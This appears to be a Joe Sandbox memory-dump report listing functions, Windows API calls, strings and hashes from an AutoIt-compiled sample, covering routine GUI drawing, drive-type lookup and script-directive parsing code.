Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 4b11d399757e6f2373f44af940e4f636b68b36653a12c6504407fc00501404db
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 08C162322051930ADF6D473AC47423EFAA19EA37B1B1A176DF4B2DB1D5EE20C925D720

Function 00A31978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 028a0a6eba535991520892db62e2cf17a4ae82862b932ddc96ac9630a245aca9
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 0AC16F322091930ADF6D473AC47413EFAA19EA37F271A176DF4B2CB1D4EE20C965D660

Function 00A87806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A8785B
DeleteObject.GDI32(00000000), ref: 00A8786D
DestroyWindow.USER32 ref: 00A8787B
GetDesktopWindow.USER32 ref: 00A87895
GetWindowRect.USER32(00000000), ref: 00A8789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00A879DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A879ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87A35
GetClientRect.USER32(00000000,?), ref: 00A87A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A87A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87ABB
GlobalLock.KERNEL32(00000000), ref: 00A87AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AD3
GlobalUnlock.KERNEL32(00000000), ref: 00A87ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AE3
GlobalFree.KERNEL32(00000000), ref: 00A87AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AA2CAC,00000000), ref: 00A87B16
GlobalFree.KERNEL32(00000000), ref: 00A87B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00A87B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A87B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87D7A

Strings

, xrefs: 00A87D00
static, xrefs: 00A87A75, 00A87BCC
AutoIt v3, xrefs: 00A87A2D
DISPLAY, xrefs: 00A87BDD

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 8897c169abf79b191050d95f1c0115388d0b69d50aa9adf1a3a9f49ed277210b
Instruction ID: 660be0109855ee5e7ad2308fbdb2ee342c25dadc6ffdc96df62620b30e9aa464
Opcode Fuzzy Hash: 8897c169abf79b191050d95f1c0115388d0b69d50aa9adf1a3a9f49ed277210b
Instruction Fuzzy Hash: E8024C71A00115EFDB14DFA4DD89EAE7BB9EB48310F148159F915EB2A1CB30ED42CB60

Function 00A9356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00A9F910), ref: 00A93627
IsWindowVisible.USER32(?), ref: 00A9364B

Strings

EDITPASTE, xrefs: 00A9395F
SELECTSTRING, xrefs: 00A93806
ISVISIBLE, xrefs: 00A93637
TABLEFT, xrefs: 00A93687
FINDSTRING, xrefs: 00A93776
HIDEDROPDOWN, xrefs: 00A93700
SHOWDROPDOWN, xrefs: 00A936E0
TABRIGHT, xrefs: 00A9369D
CURRENTTAB, xrefs: 00A936BD
GETLINECOUNT, xrefs: 00A938C6
UNCHECK, xrefs: 00A93883
GETCURRENTLINE, xrefs: 00A938ED
GETLINE, xrefs: 00A9399B
ADDSTRING, xrefs: 00A93716
ISENABLED, xrefs: 00A9366B
CHECK, xrefs: 00A9386D
SETCURRENTSELECTION, xrefs: 00A937B6
GETCURRENTCOL, xrefs: 00A93928
GETCURRENTSELECTION, xrefs: 00A937E3
DELSTRING, xrefs: 00A93749
ISCHECKED, xrefs: 00A93839
SENDCOMMANDID, xrefs: 00A939DA
GETSELECTED, xrefs: 00A938A3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 1318bd9d8f7265da8438448ca3287cff6c493f21203d4a36d0ec1840ec44994a
Instruction ID: d9f9feed8c4ae59906071bbba91c98de2218e45b1414343ee84beb91419c3c4f
Opcode Fuzzy Hash: 1318bd9d8f7265da8438448ca3287cff6c493f21203d4a36d0ec1840ec44994a
Instruction Fuzzy Hash: 6DD14A326083019FCF04EF10C665EAF77F5AF95394F154468F8865B2A2DB21EE4ACB45

Function 00A9A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A9A630
GetSysColorBrush.USER32(0000000F), ref: 00A9A661
GetSysColor.USER32(0000000F), ref: 00A9A66D
SetBkColor.GDI32(?,000000FF), ref: 00A9A687
SelectObject.GDI32(?,00000000), ref: 00A9A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A6C1
GetSysColor.USER32(00000010), ref: 00A9A6C9
CreateSolidBrush.GDI32(00000000), ref: 00A9A6D0
FrameRect.USER32(?,?,00000000), ref: 00A9A6DF
DeleteObject.GDI32(00000000), ref: 00A9A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00A9A731
FillRect.USER32(?,?,00000000), ref: 00A9A763
GetWindowLongW.USER32(?,000000F0), ref: 00A9A78E

Part of subcall function 00A9A8CA: GetSysColor.USER32(00000012), ref: 00A9A903
Part of subcall function 00A9A8CA: SetTextColor.GDI32(?,?), ref: 00A9A907
Part of subcall function 00A9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00A9A91D
Part of subcall function 00A9A8CA: GetSysColor.USER32(0000000F), ref: 00A9A928
Part of subcall function 00A9A8CA: GetSysColor.USER32(00000011), ref: 00A9A945
Part of subcall function 00A9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A9A953
Part of subcall function 00A9A8CA: SelectObject.GDI32(?,00000000), ref: 00A9A964
Part of subcall function 00A9A8CA: SetBkColor.GDI32(?,00000000), ref: 00A9A96D
Part of subcall function 00A9A8CA: SelectObject.GDI32(?,?), ref: 00A9A97A
Part of subcall function 00A9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A999
Part of subcall function 00A9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A9A9B0
Part of subcall function 00A9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00A9A9C5
Part of subcall function 00A9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A9A9ED

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 2a480b7a3813ec533a6c65b54955f12c7e2035995a9678a9a692e920c62c436c
Instruction ID: ec2e4de2a5d5076705936db9faeb221d1b2879e0b89d751d6e4c219e0fd6fa93
Opcode Fuzzy Hash: 2a480b7a3813ec533a6c65b54955f12c7e2035995a9678a9a692e920c62c436c
Instruction Fuzzy Hash: 08914E72608301EFDB10DFA4DC48A5B7BE9FB48321F104B2AF962D61A0DB71D945CB92

Function 00A12C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00A12CA2
DeleteObject.GDI32(00000000), ref: 00A12CE8
DeleteObject.GDI32(00000000), ref: 00A12CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00A12CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00A12D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00A4C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A4C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A4C89D

Part of subcall function 00A11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A12036,?,00000000,?,?,?,?,00A116CB,00000000,?), ref: 00A11B9A

SendMessageW.USER32(?,00001053), ref: 00A4C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A4C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A4C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A4C912

Strings

0, xrefs: 00A4C731

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 730a98dc54b6769a6f380e722503e1963bbfdbe80fc6cc6dde5fde28ac23e787
Instruction ID: 8d4f30b4395a1dc70deba9086dd138ee69bcf41dd70cdc9fb411c2f160306235
Opcode Fuzzy Hash: 730a98dc54b6769a6f380e722503e1963bbfdbe80fc6cc6dde5fde28ac23e787
Instruction Fuzzy Hash: AC129F34601201EFDB55CF24C984BA9B7E5FF84320F584569F999CB262DB31EC92CB91

Function 00A874AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00A874DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A8759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A875DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A875ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A87633
GetClientRect.USER32(00000000,?), ref: 00A8763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A87683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A87692
GetStockObject.GDI32(00000011), ref: 00A876A2
SelectObject.GDI32(00000000,00000000), ref: 00A876A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A876B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A876BF
DeleteDC.GDI32(00000000), ref: 00A876C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A876F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00A8770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A87746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A8775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00A8776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A8779B
GetStockObject.GDI32(00000011), ref: 00A877A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A877B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A877BB

Strings

static, xrefs: 00A8767D, 00A87795
msctls_progress32, xrefs: 00A8773C
AutoIt v3, xrefs: 00A8762B
DISPLAY, xrefs: 00A87688

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 300a27eb4d97e07e6c4cd4c5d93c7a121ecbd70d04971f3e492c9ee98586624f
Instruction ID: ef5230cd106d28b1d6e8e7549591a1ac059d5dedb2b3a4b59b7cdab5ab433da0
Opcode Fuzzy Hash: 300a27eb4d97e07e6c4cd4c5d93c7a121ecbd70d04971f3e492c9ee98586624f
Instruction Fuzzy Hash: 95A14C71A40619BFEB14DBA4DD4AFAE7BB9EB08710F104215FA15E72E0DA70AD01CB64

Function 00A7AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A7AD1E
GetDriveTypeW.KERNEL32(?,00A9FAC0,?,\\.\,00A9F910), ref: 00A7ADFB
SetErrorMode.KERNEL32(00000000,00A9FAC0,?,\\.\,00A9F910), ref: 00A7AF59

Strings

Network, xrefs: 00A7AE39
Fibre, xrefs: 00A7AEE9
\\.\, xrefs: 00A7AD70
CDROM, xrefs: 00A7AE2F
SCSI, xrefs: 00A7AEC6
SSD, xrefs: 00A7AE86
MMC, xrefs: 00A7AF1A
Unknown, xrefs: 00A7AE1B, 00A7AEBF
ATAPI, xrefs: 00A7AECD
Virtual, xrefs: 00A7AF21
Fixed, xrefs: 00A7AE43
1394, xrefs: 00A7AEDB
RAID, xrefs: 00A7AEF7
USB, xrefs: 00A7AEF0
PhysicalDrive, xrefs: 00A7ADA7
SSA, xrefs: 00A7AEE2
RAMDisk, xrefs: 00A7AE25
SAS, xrefs: 00A7AF05
iSCSI, xrefs: 00A7AEFE
ATA, xrefs: 00A7AED4
Removable, xrefs: 00A7AE4D
SATA, xrefs: 00A7AF0C
FileBackedVirtual, xrefs: 00A7AF28

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 61b9ad0c1c9cacb64cd70e2f3fc096297432ec4fd78c8a1f5b817ea0b61a981d
Instruction ID: c1873587078e65120e6a016162b4e48527a1350aaf1e7ceb1568945ebbddd839
Opcode Fuzzy Hash: 61b9ad0c1c9cacb64cd70e2f3fc096297432ec4fd78c8a1f5b817ea0b61a981d
Instruction Fuzzy Hash: 1451A1B1649205FB8B14EB10CE92DBE73B1FBA8740722C85BE40BA72D1DA359D41DB47

Function 00A168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A16931
__wcsnicmp.LIBCMT ref: 00A16949
__wcsnicmp.LIBCMT ref: 00A16961
__wcsnicmp.LIBCMT ref: 00A16979
__wcsnicmp.LIBCMT ref: 00A16991
__wcsnicmp.LIBCMT ref: 00A169A9
__wcsnicmp.LIBCMT ref: 00A169C1
__wcsnicmp.LIBCMT ref: 00A169D5
__wcsnicmp.LIBCMT ref: 00A16A16
__wcsnicmp.LIBCMT ref: 00A16A2A
__wcsnicmp.LIBCMT ref: 00A16A3E
__wcsnicmp.LIBCMT ref: 00A16A52

Strings

Bad directive syntax error, xrefs: 00A4E31A
#include-once, xrefs: 00A1698B
#comments-end, xrefs: 00A16A38
#notrayicon, xrefs: 00A16943
#include, xrefs: 00A169A3
#cs, xrefs: 00A169CF, 00A16A24
Unterminated group of comments, xrefs: 00A4E403
#OnAutoItStartRegister, xrefs: 00A16973
#comments-start, xrefs: 00A169BB, 00A16A10
Cannot parse #include, xrefs: 00A4E3F0
#requireadmin, xrefs: 00A1695B
#ce, xrefs: 00A16A4C
#pragma compile, xrefs: 00A1692B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: dfe676dcd28ce3b78a5c873bb71038439c44570e4fdbac1d5b345183b789e75d
Instruction ID: 223b36717db1b714db452ac853f0b013b88f25e291dd13573afadf7f3e9bf2fc
Opcode Fuzzy Hash: dfe676dcd28ce3b78a5c873bb71038439c44570e4fdbac1d5b345183b789e75d
Instruction Fuzzy Hash: 7C81FDB5640205BBCF21EF60EE42FFE77B8BF05740F044024F845EA192EB61EA95C2A1

Function 00A99A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00A99AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A99B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00A99BA7

Strings

0, xrefs: 00A99BE4

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 59d00cf2ebc6574a41ba46b3a0e014fc5a1e32c08199211147b7f7e6d5f00a2f
Instruction ID: a054d4f09ab10ebb3b38c64803de4ebdc6c7ae88746271298eb550e82ca9ba30
Opcode Fuzzy Hash: 59d00cf2ebc6574a41ba46b3a0e014fc5a1e32c08199211147b7f7e6d5f00a2f
Instruction Fuzzy Hash: 5B028C30204341BFEB25CF28C889BABBBE5FB49314F04852DF995D62A1DB35D945CB92

Function 00A9A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A9A903
SetTextColor.GDI32(?,?), ref: 00A9A907
GetSysColorBrush.USER32(0000000F), ref: 00A9A91D
GetSysColor.USER32(0000000F), ref: 00A9A928
CreateSolidBrush.GDI32(?), ref: 00A9A92D
GetSysColor.USER32(00000011), ref: 00A9A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A9A953
SelectObject.GDI32(?,00000000), ref: 00A9A964
SetBkColor.GDI32(?,00000000), ref: 00A9A96D
SelectObject.GDI32(?,?), ref: 00A9A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A9A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00A9A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A9A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A9AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00A9AA32
DrawFocusRect.USER32(?,?), ref: 00A9AA3D
GetSysColor.USER32(00000011), ref: 00A9AA4B
SetTextColor.GDI32(?,00000000), ref: 00A9AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A9AA67
SelectObject.GDI32(?,00A9A5FA), ref: 00A9AA7E
DeleteObject.GDI32(?), ref: 00A9AA89
SelectObject.GDI32(?,?), ref: 00A9AA8F
DeleteObject.GDI32(?), ref: 00A9AA94
